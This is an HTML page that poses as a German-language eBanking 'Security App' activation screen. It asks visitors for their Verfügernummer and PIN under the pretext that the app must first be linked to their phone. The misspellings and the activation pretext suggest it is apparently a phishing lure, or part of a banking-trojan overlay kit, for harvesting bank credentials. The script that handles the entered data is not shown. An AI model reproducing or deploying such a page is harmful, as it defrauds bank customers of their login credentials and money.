<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Security App</title>
    <link rel="stylesheet" href="css/styles.css">
</head>
<body>

    <div class="app">

        <div class="header">
            <div class="logo">
                <img src="img/shield_logo.png" alt="">
            </div>
            <div class="title">
                Verfuger Login
            </div>
        </div>

        <div class="content">
            <div>
                Die Security App ist nicht mit lhrem Mobiltelefon verknupft und muss daher zuerst artiviert werden.
                <br><br>
                ittle loggen Sie sich hier mit ihren eBanking Zugangsdaten ein.
            </div>
        
            <div class="input">
                <div class="icon">
                    <img src="img/login.png" alt="">
                </div>
                <input type="text" name="log" placeholder="Verfugernummer">
            </div>
            <div class="input-link">
                <svg width="11" height="18" viewBox="0 0 11 18" fill="none" xmlns="http://www.w3.org/2000/svg">
                <path fill-rule="evenodd" clip-rule="evenodd" d="M1.70718 0.292969L10.4143 9.00008L1.70718 17.7072L0.292969 16.293L7.58586 9.00008L0.292969 1.70718L1.70718 0.292969Z" fill="black"/>
                </svg>

                Verfuger gesperrt?
            </div>
        
            <div class="input m-top-20">
                <div class="icon">
                    <img src="img/pass.png" alt="">
                </div>
                <input type="password" name="pass" placeholder="PIN">
            </div>
            <div class="input-link">
                <svg width="11" height="18" viewBox="0 0 11 18" fill="none" xmlns="http://www.w3.org/2000/svg">
                <path fill-rule="evenodd" clip-rule="evenodd" d="M1.70718 0.292969L10.4143 9.00008L1.70718 17.7072L0.292969 16.293L7.58586 9.00008L0.292969 1.70718L1.70718 0.292969Z" fill="black"/>
                </svg>

                PIN vergessen?
            </div>
        
            <div class="controls">
                <button class="btn js-send-btn" disabled>Login</button>
            </div>
        </div>

    </div>

    <script src="js/main.js"></script>
    
</body>
</html>